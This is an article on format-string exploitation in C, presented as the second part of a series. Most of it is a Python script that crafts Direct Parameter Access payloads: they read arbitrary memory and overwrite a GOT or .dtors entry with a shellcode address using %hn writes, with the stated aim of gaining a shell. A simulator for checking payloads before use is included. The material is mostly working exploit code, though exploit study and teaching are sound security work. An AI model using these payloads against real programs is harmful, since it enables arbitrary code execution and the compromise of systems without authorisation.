DPA Exploitation and GOTs With Python

This article is the second part of a look at format strings in the C and C++ programming languages and, in particular, how they can be abused. It moves on to crafting attacks in Python that use DPA (Direct Parameter Access) to perform a 4-byte overwrite of a .dtors entry or a GOT (Global Offset Table) slot, then continues with exploiting the GOT and injecting shellcode. We demonstrate how these simple vulnerabilities, still often overlooked and even still taught, can be used to read arbitrary memory locations, write to memory, execute commands and, finally, gain a shell.
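The payload construction the article builds up to, as an added Python example that is not code from the original article: a DPA format string that writes a 32-bit value to a chosen address using two %hn half-word writes, plus a small model of printf's character counting so the payload can be checked before it is sent to a target. It assumes a 32-bit little-endian process in which printf(buf) is called with an attacker-controlled buf, and that the positional argument number at which the start of buf appears (buf_param, found beforehand by spraying "%N$x" and looking for the buffer's own bytes) is already known. The addresses and the value are placeholders; in practice target_addr would be a GOT or .dtors slot and value the address of the shellcode.

```python
"""Craft DPA (Direct Parameter Access) format strings.

Added example, not code from the original article. Assumes a 32-bit
little-endian target where printf(buf) is called on attacker input and
the first 4 bytes of buf are reachable as positional argument
`buf_param`. target_addr/value below are placeholders.
"""
import re
import struct


def build_dpa_read(addr, buf_param):
    """Payload that prints the NUL-terminated string stored at `addr`."""
    return struct.pack("<I", addr) + ("%%%d$s" % buf_param).encode()


def build_dpa_write(target_addr, value, buf_param):
    """Payload that stores the 32-bit `value` at `target_addr`.

    Two %hn half-word writes are used instead of one %n so no single
    padding ever has to exceed 65535 characters. The two addresses sit in
    the first 8 bytes of the payload, so they are positional arguments
    buf_param (target_addr) and buf_param + 1 (target_addr + 2). Writes
    are ordered by ascending half-word so the running character count
    only has to grow, modulo 2**16.
    """
    addrs = struct.pack("<I", target_addr) + struct.pack("<I", target_addr + 2)
    if b"\x00" in addrs:
        # A NUL inside the addresses would end the string before the
        # conversion directives are reached.
        raise ValueError("target address contains a NUL byte")
    printed = len(addrs)  # the address bytes are echoed and counted too
    halves = sorted([
        (value & 0xFFFF, buf_param),               # low half  -> target_addr
        ((value >> 16) & 0xFFFF, buf_param + 1),   # high half -> target_addr + 2
    ])
    fmt = ""
    for want, idx in halves:
        pad = (want - printed) % 0x10000
        if pad:
            fmt += "%%%dc" % pad       # width padding: prints exactly pad chars
            printed += pad
        fmt += "%%%d$hn" % idx         # store low 16 bits of chars printed so far
    return addrs + fmt.encode()


def simulate(payload, buf_param):
    """Model printf's behaviour on `payload`: return {address: half-word}.

    Positional arguments are modelled as the 4-byte words of the payload
    itself, which is exactly the situation when buf is positional arg
    `buf_param`. Literal bytes count 1, %Nc counts N, %I$hn stores.
    """
    words = [struct.unpack("<I", payload[i:i + 4])[0]
             for i in range(0, len(payload) - 3, 4)]
    spec = re.compile(rb"%(?:(\d+)c|(\d+)\$hn)")
    count, stores, pos = 0, {}, 0
    while pos < len(payload):
        m = spec.match(payload, pos)
        if m is None:
            count += 1                 # literal byte echoed to output
            pos += 1
            continue
        if m.group(1) is not None:
            count += int(m.group(1))   # %Nc
        else:
            idx = int(m.group(2))      # %I$hn -> address in arg I
            stores[words[idx - buf_param]] = count & 0xFFFF
        pos = m.end()
    return stores


def recover(stores, target_addr):
    """Reassemble the 32-bit value from the two simulated half-word stores."""
    return stores[target_addr] | (stores[target_addr + 2] << 16)


if __name__ == "__main__":
    got_slot, shellcode, arg = 0x0804A014, 0xBFFFF6C0, 7   # placeholders
    payload = build_dpa_write(got_slot, shellcode, arg)
    print(payload)
    print(hex(recover(simulate(payload, arg), got_slot)))
```

The simulator is the check a practitioner wants before firing the payload: if the argument index is off by one, or the address pair is misaligned relative to the argument slots, the stores land on the wrong words and the recovered value will not match. It does not model the usual real-world complications, such as having to prepend alignment bytes when buf does not start on an argument boundary, or the target's printf refusing %n for a writable format string when fortification is on.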